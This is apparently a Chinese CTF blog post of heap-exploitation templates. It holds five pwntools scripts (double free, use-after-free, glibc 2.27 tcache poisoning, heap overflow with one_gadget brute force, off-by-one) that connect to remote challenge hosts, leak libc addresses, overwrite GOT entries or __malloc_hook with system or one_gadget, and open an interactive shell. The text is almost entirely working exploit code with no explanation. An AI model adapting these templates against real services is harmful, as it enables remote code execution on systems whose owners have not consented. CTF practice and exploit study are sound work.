heap模板

文章发布时间:

最后更新时间:

文章总字数:
1.4k

预计阅读时间:
8 分钟

页面浏览:加载中...

double free

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
from pwn import *

context(arch='i386', log_level='debug', os='linux')

#p = process('./heap_Double_Free')
p=remote('123.60.135.228', 2056)

def fulltcache():
for i in range(7):
malloc(i, b'qwer')
for i in range(7):
free(i)

def malloc(id, contet):
p.sendlineafter('root@ubuntu:~/Desktop$', b'1')
p.sendlineafter('please input id and size :', str(id))
sleep(0.1)
p.sendline(b'100')
p.sendlineafter('please input contet:', contet)

def free(id):
p.sendlineafter('root@ubuntu:~/Desktop$', b'2')
p.sendlineafter('please input id :', str(id))

def print(id):
p.sendlineafter('root@ubuntu:~/Desktop$', b'3')
p.sendlineafter('please input id :', str(id))


fulltcache()

malloc(1, b'qwer')
malloc(2, b'qwer')
malloc(3, b'qwer')


free(1)
free(2)
free(1)

#attach(p)
malloc(4,p64(0x006010A0))#可修改的内容在这个地址后16字节
malloc(5,b'qwer')
malloc(6,b'qwer')
malloc(7,p64(257))
p.interactive()

uaf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pwn import *

context(arch='i386', log_level='debug', os='linux')
elf=ELF("./pwn")


def malloc(size, contet):
p.sendlineafter("5. exit", b'1')
p.sendlineafter("--->", str(size))
p.sendafter("--->", contet)
def free(id):
p.sendlineafter("5. exit", b'3')
p.sendlineafter("--->", str(id))

def edit(id,size,contet):
p.sendlineafter("5. exit", b'2')
p.sendlineafter("--->", str(id))
p.sendlineafter("--->", str(size))
p.sendafter("--->", contet)

def show(id):
p.sendlineafter("5. exit", b'4')
p.sendlineafter("--->", str(id))


# p = process('./pwn')
p = remote('node4.buuoj.cn', 26517)
libc = ELF('libc-2.23.so')
malloc(0x80, b'qwer')
malloc(0x80, b'qwer')
malloc(0x68, b'qwer')
malloc(0x68, b'qwer')
malloc(0x68, b'/bin/sh')

free(0)
show(0)
p.recvuntil(":")
libc_base = u64(p.recv(7)[1:] + b'\0' * 2) - 0x7fef613c4b78 + 0x7fef61000000
system = libc_base + libc.sym["system"]
free_got = elf.got['free']
# pause()
free(2)
free(3)
free(2)
malloc(0x68, p64(0x0000000006020C0 - 0x23))
malloc(0x68, 'ase')
malloc(0x68, 'ase')
print(hex(libc_base))
print(hex(free_got))
malloc(0x68, b'a' * (0x23 - 0x10) + p64(free_got))
# attach(p)
edit(0, 10, p64(system))
p.sendlineafter("5. exit", b'3')
p.sendlineafter("--->", b'4')
p.interactive()

2.27uaf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
from struct import pack
context.log_level='debug'
context(os = 'linux', arch = 'amd64')

#p = process('./pwn')
p = remote('43.142.108.3', 28585)
elf = ELF('./pwn')
#libc = ELF('buu/libc-2.27-x64.so')
#libc = ELF('glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
libc = ELF('libc-2.27.so')

def debug():
gdb.attach(p)
pause()
def add(size, name, content):
p.sendlineafter(b'Choice: \n', '1')
p.sendlineafter(b'Size:\n', str(size))
p.sendafter(b'Name: \n', name)
p.sendafter(b'Content:\n', content)
def free(index):
p.sendlineafter(b'Choice: \n', '2')
p.sendlineafter(b'idx:\n', str(index))
def show(index):
p.sendlineafter(b'Choice: \n', '3')
p.sendlineafter(b'idx:\n', str(index))
def edit(index, content):
p.sendlineafter(b'Choice: \n', '4')
p.sendlineafter(b'idx:\n', str(index))
p.send(content)
# leak libcbase
add(0x410, b'1', b'a') #index 0
add(0x20, b'1', b'a') #index 1
add(0x10, b'1', b'a') #index 2
free(0)
show(0)
libcbase = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
print(' libcbase -> ', hex(libcbase))

# malloc_hook -> one_gadget
one_gadget = libcbase + 0x10a2fc
malloc_hook = libcbase + libc.sym['__malloc_hook']
free(1)
edit(1, p64(malloc_hook))
add(0x10, b'1', b'a') #index 3
add(0x20, b'1', b'a') #index 4
edit(4, p64(one_gadget))

# pwn
p.sendlineafter(b'Choice: \n', '1')
p.sendlineafter(b'Size:\n', b'10')
p.interactive()

堆溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
from pwn import *

def connetc():
global p,elf,libc
p=remote('192.168.109.168',10000)
#p=process('./Emo_Chunk')
elf=ELF('./Emo_Chunk')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#context.log_level='debug'
def add(size):
p.sendlineafter("Please Choice!",'1')
p.sendlineafter("Please Input Size:",str(size))

def dele(index):
p.sendlineafter("Please Choice!",'2')
p.sendlineafter("Please Input index:",str(index))

def show(index):
p.sendlineafter("Please Choice!",'4')
p.sendlineafter("Please Input index:",str(index))
def edit(index,content):
p.sendlineafter("Please Choice!",'3')
p.sendlineafter("Please Input index:",str(index))
p.sendlineafter("Change EMo Content",content)
def pwn(i,j):
add(0x68)#0
add(0x68)#1
add(0x68)#2
add(0x68)#3
add(0x68)#4
add(0x68)#5

edit(0,'a'*0x68 + '\xe1' + '\x00'*7)

dele(1)
add(0x68)
show(2)
p.recvuntil('\n')

addr = u64(p.recv(6).ljust(8,'\x00'))
print("addr : " + hex(addr-0x3c4b78))

libc_addr = addr - 0x3c4b78
dele(4)
edit(3,'a'*0x68 + p64(0x71) + p64(libc_addr+libc.symbols['__malloc_hook']-0x23))
print(hex(libc_addr+libc.symbols['__malloc_hook']-0x23))

realloc_hook = libc_addr + libc.sym['__realloc_hook']
log.info("realloc_hook:"+hex(realloc_hook))
realloc = libc_addr + libc.sym['realloc']
log.info("realloc:"+hex(realloc))

add(0x68) #4

add(0x68) #6
one = [0x45226,0x4527a,0xf03a4,0xf1247]
edit(6,cyclic(11)+p64(libc_addr+one[i]) + p64(realloc + j))
add(0x30)

p.interactive()
for i in range(4):
for j in [0,2,4,6,8,10,13,16,20]:
try:
print("i :",i)
print("j :",j)
connetc()
pwn(i,int(j))
p.close()
except :
print("...")
p.close()

off_by_one

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.arch='amd64'

def add(size,contet):
p.sendafter("Your choice :",b'1')
p.sendafter("Size of Heap :",str(size))
p.sendafter("Content of heap:",contet)

def edit(index,contet):
p.sendafter("Your choice :",b'2')
p.sendafter("Index :",str(index))
p.sendafter("Content of heap :",contet)

def show(index):
p.sendafter("Your choice :",b'3')
p.sendafter("Index :", str(index))

def dele(index):
p.sendafter("Your choice :",b'4')
p.sendlineafter("Index :",str(index))

# p= process("./heapcreator")
p=remote("node4.buuoj.cn",27274)
add(0x18,b'a')
add(0x10,b'b')
add(0x10,b'c')
add(0x10,b'/bin/sh')
edit(0,b'a'*0x18+b'\x81')
dele(1)
add(0x70,b'a')
edit(1,0x10*b'b'+p64(0)+p64(0x21)+p64(0x40)+p64(0x000000000602018))
# attach(p)
show(1)
free=p.recvuntil("\x7f")[-6:]+b'\0'*2
free = u64(free)
print(hex(free))
libc=LibcSearcher("free",free)
system=libc.dump("system")
print(libc)
#attach(p)
edit(1,p64(system+free-libc.dump("free")))
dele(3)
p.interactive()